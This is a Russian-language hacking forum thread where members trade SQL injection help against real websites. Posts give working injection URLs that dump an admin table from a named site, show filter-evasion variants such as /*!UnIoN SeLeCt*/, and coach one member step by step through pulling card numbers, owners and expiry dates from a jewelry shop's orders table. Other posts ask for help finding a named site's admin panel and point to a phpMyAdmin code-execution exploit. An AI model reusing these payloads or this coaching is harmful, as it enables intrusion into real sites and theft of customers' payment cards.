Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    http://www.oasisoftheseas.com/viewRelease.php?id=-25+union+select+concat_ws(0x3a,id,name,password),2+from+adminUsers+--+
     
    2 people like this.
  2. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    http://www.site.com/info.php?id=1'
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

    скуля есть, поля нашёл но при определение выводимых столбцов union select выдаёт

    Forbidden
    You don't have permission to access /info.php on this server.
    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


    з.ы. это шоп c ювелиркой, кто поможет и объеснит c меня + и линк!
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    стоит фильтр, попробуй так /!*union*/+/!*select*/
     
    _________________________
  4. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    or
    union%0aselect :)
     
  5. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    или
    /*!UnIoN+SeLeCt*/
    UnIoN/**/SeLeCt
     
    1 person likes this.
  6. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Вот нашел на хакер.ру уязвимость:
    Помогите скулю раскрутить, а то что-то не получается.
    Вот пример сайта на этой CMS: http://bobsguides.com/manager/index.php?id=4&a=16
     
  7. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    мэн там нету скули
     
  8. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1

    респект
    /*!UnIoN+SeLeCt*/)) лови +
     
  9. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    думаю скоро он опять появится...
    т.к. дальше наверно тож будет фильтр
     
  10. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    На хакер.ру ошиблись? Или сайт для примера с закрытой дыркой?
     
  11. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Может, дашь акк тестовый? Ибо без логина там и крутить нечего
     
  12. BlackFan

    BlackFan Member

    Joined:
    3 Jan 2009
    Messages:
    47
    Likes Received:
    40
    Reputations:
    32
    Инъекция есть...
    Но чтобы ее использовать надо как минимум
    1) доступ в админку
    2) magic_quotes = Off

    mutate_templates.dynamic.php
    PHP:
    if ($_REQUEST['a'] == 16) { 
        
    $sql "SELECT tv.name as 'name', tv.id as 'id', tr.templateid, tr.rank, if(isnull(cat.category),'".$_lang['no_category']."',cat.category) as category
        FROM "
    .$modx->getFullTableName('site_tmplvar_templates')." tr
        INNER JOIN "
    .$modx->getFullTableName('site_tmplvars')." tv ON tv.id = tr.tmplvarid
        LEFT JOIN "
    .$modx->getFullTableName('categories')." cat ON tv.category = cat.id
        WHERE tr.templateid='"
    .$_REQUEST['id']."' ORDER BY tr.rank ASC";

    $rs $modx->db->query($sql);
     
  13. manerus

    manerus New Member

    Joined:
    10 Aug 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    вот что получилось
    http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,/*!concat*/(column_name)+/*!from*/+/*!information_schema*/./*!columns*/+/*!where*/+/*!table_name*/=0x6f7264657273+limit+36,1--

    выдрал данные из таблицы orders выдралось cc_type, cc_number, cc_owner, cc_expires, cvv нету походу, теперь как получить эти самые данные сс?

    зы голова не соображает ладно "утро вечера мудренее"
     
  14. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    concat_ws (0x3a,cc_type,cc_number,cc_owner,cc_expires) from orders
     
  15. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    http://www.site.com/info.php?id=-1+/*!UnIoN+SeLeCt+concat_ws(0x3a,cc_type,cc_number,cc_owner,cc_expires),2,3,4+from+orders+limit+0,1*/+--+


    Если принтабельна первая колонка
    И не извращайся с псевдокомментами, хватит одного для обхода WAF
     
    1 person likes this.
  16. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    хотел бы спросить. как нибудь можно вызвать ошибки на сайте чтоб узнать полный путь. если сайт на ASP
     
  17. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    https://forum.antichat.ru/threadnav31427-1-10.html
     
    1 person likes this.
  18. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    http://www.fragrance.org/

    помогите найти админку))

    директория phpmyadmin и members не интересует=)
     
  19. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Ну и зря не интересует, в pma версиях ниже 2.11.9 есть замечательный баг с исполнением php кода
    http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
     
  20. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    mq=on, неполучится.
     
Thread Status:
Not open for further replies.